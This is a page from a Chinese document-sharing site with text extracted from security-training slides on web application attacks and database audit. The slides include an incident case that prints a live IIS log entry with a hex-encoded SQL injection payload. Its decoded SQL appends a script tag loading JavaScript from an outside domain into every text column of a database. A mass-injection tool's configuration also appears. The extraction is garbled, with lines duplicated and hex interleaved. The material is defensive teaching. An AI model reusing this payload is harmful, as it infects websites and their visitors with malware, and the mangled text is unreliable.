Web Application Security and Database Audit Miscs.ppt
《Web Application Security and Database Audit Miscs.ppt》由会员分享,可在线阅读,更多相关《Web Application Security and Database Audit Miscs.ppt(66页珍藏版)》请在淘文阁 - 分享文档赚钱的网站上搜索。
1、Web Application Security and Web Application Security and Database Audit MiscsDatabase Audit MiscsDBAPPSecurity IncDBAPPSecurity Inc杭州安恒信息技术有限公司杭州安恒信息技术有限公司FrankdbappSFrankdbappSFrank.F主讲人主讲人Frank.FanFrank.Fan范渊范渊杭州安恒信息技术有限公司杭州安恒信息技术有限公司DBAPPSecurity IncDBAPPSecurity IncFounder and CTOFounder and CT
2、O毕业于美国加州大学计算机科学方向硅谷国际著名安全公司从事十多年的技术研发和项目管理对应用安全、数据库安全和审计、compliance(如SOX,PCI,ISO17799/27001)有着非常资深经验第一个登上全球最权威黑帽子安全大会演讲的中国人CISSP,CISA,GCIH,GCIAOWASP中国分会副会长2008北京奥组委安全组成员浙江省信息安全协会安全服务委员会负责人本期要点:本期要点:FWebWeb应用安全挑战和分析应用安全挑战和分析F数据库审计数据库审计 安全风险安全风险+管理风险管理风险 -审计审计主要内容主要内容F公司简介公司简介F数据库安全审计概念数据库安全审计概念F各类规范要
3、求和数据库审计系统需求分析各类规范要求和数据库审计系统需求分析F明御数据库审计与风险控制系统明御数据库审计与风险控制系统F案例分析案例分析F小结小结2008北京奥组委安全产品和服务提供商北京奥组委安全产品和服务提供商作为2008北京奥组委安全产品和服务提供商,2008年9月安恒信息被2008北京奥运会组委会授予08奥运安全保障杰出贡献奖。Many Incident Handling Support安恒机密.|7黑客产业链黑客产业链入侵者入侵者入侵企业入侵企业服务器服务器窃取机密信息窃取机密信息(图纸、财务报图纸、财务报表等)表等)出售出售收费传播流氓软件获取金获取金钱钱拒绝服务攻击发送垃圾邮件
4、批量入批量入侵网站侵网站盗取银行帐号盗取银行帐号盗取银行帐号盗取银行帐号盗取信用卡帐号盗取信用卡帐号盗取信用卡帐号盗取信用卡帐号盗取证券交易帐号盗取证券交易帐号盗取证券交易帐号盗取证券交易帐号盗取虚拟财产盗取虚拟财产盗取虚拟财产盗取虚拟财产组建僵尸网络组建僵尸网络组建僵尸网络组建僵尸网络洗钱洗钱主动攻击勒索网站受雇攻击收取佣金安恒机密.|8F总共检测网站近总共检测网站近700700家家F90%90%网站存在严重安全隐患网站存在严重安全隐患F部分网站已经被挂马或被黑客控制部分网站已经被挂马或被黑客控制AgendaAgendaFMass Injection Attack Tool Revealed
5、Mass Injection Attack Tool RevealedFPHP Backdoor TipsPHP Backdoor TipsFSome hacking tips about phpmydaminSome hacking tips about phpmydamin9Mass Injection Tool RevealedMass Injection Tool RevealedFHow did We find it?How did We find it?From a Bot Machine during Incident Handling From a Bot Machine du
6、ring Incident Handling10Real case in incident handling!Real case in incident handling!F2008-05-13 00:28:25 W3SVC628249937 22.1.1.11 POST/news_default.asp 2008-05-13 00:28:25 W3SVC628249937 22.1.1.11 POST/news_default.asp tid=117;DECLARE%20S%20NVARCHAR(4000);SET%20S=CAST(0 x4400450043004C004100520045
7、00200040005tid=117;DECLARE%20S%20NVARCHAR(4000);SET%20S=CAST(0 x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000430020007600610072006300680040020007600610072006300680061007200280032003500350029002C004000430020007600610072006300680061007200280032003
8、5003500290020004400450043004C0041005200450020005400610062006C0065005F00430610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007407500720073006F007200200043005500520053004F0
9、05200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D00200073007900700200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C007500
10、6D006E007300200062003006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E0200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074
11、007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D0780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E007003900390020006F007200200062002E00
12、780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D003100360080074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007
13、500720073006F007200200046004503700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F00430075054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F00430
14、07500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C0045002800400720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00000400046004500540043004
15、8005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D
16、0072007400720069006D00280063006F006E0076073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D0029002900200650072007400280076006100720063006800610072002C005B0027002B00400043002B002700
17、5D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006B0069006C006C0077006F00770031002E0063006E002F0067002E006A0073003E003C002F00730770077002E006B
18、0069006C006C0077006F00770031002E0063006E002F0067002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E0045005800540020004600520630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0
19、043007500720073006F007200200049004E0054004F0020004004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F00430000054002C0040004300200045004E004400200043004C004F0053004500200054006
20、10062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F07500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000);EXEC(S);-80-204.13.70.223 043007500720073006F00
21、7200%20AS%20NVARCHAR(4000);EXEC(S);-80-204.13.70.223 Mozilla/3.0+(compatible;+Indy+Library)200 0 0Mozilla/3.0+(compatible;+Indy+Library)200 0 011Real contentReal contentFDECLARE T varchar(255),C varchar(255)DECLARE DECLARE T varchar(255),C varchar(255)DECLARE Table_Cursor CURSOR FOR select a.name,b.
22、name from Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and sysobjects a,syscolumns b where a.id=b.id and a.xtype=u and(b.xtype=99 or b.xtype=35 or a.xtype=u and(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)OPEN Table_Cursor FETCH b.xtype=231 o
23、r b.xtype=167)OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO T,C NEXT FROM Table_Cursor INTO T,C WHILE(FETCH_STATUS=0)BEGIN exec(update+T+WHILE(FETCH_STATUS=0)BEGIN exec(update+T+set set+C+=rtrim(convert(varchar,+C+)+script+C+=rtrim(convert(varchar,+C+)+)FETCH src=http:/ NEXT FROM Table_Cursor
24、INTO T,C END CLOSE NEXT FROM Table_Cursor INTO T,C END CLOSE Table_Cursor DEALLOCATE Table_CursorTable_Cursor DEALLOCATE Table_Cursor12Key part:Key part:Fscript src=http:/ Injection Tool RevealedMass Injection Tool Revealed14Mass Injection Tool RevealedMass Injection Tool Revealed15Mass Injection To
25、ol-Config.iniMass Injection Tool-Config.iniFinitinitFedkey=inurl:(.aspx?-(gov)edkey=inurl:(.aspx?-(gov)自动产生自动产生 Franklimit=1000000ranklimit=1000000Fcipin=50cipin=50Ftimeout=20timeout=20Fprocess=1process=1Fretry=3retry=3Fthread=88thread=88Fbufferlength=10bufferlength=10Fcpu=115cpu=115Fsellang=0sellan
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- Web Application Security and Database Audit Miscs
链接地址:https://www.taowenge.com/p-67338561.html
限制150内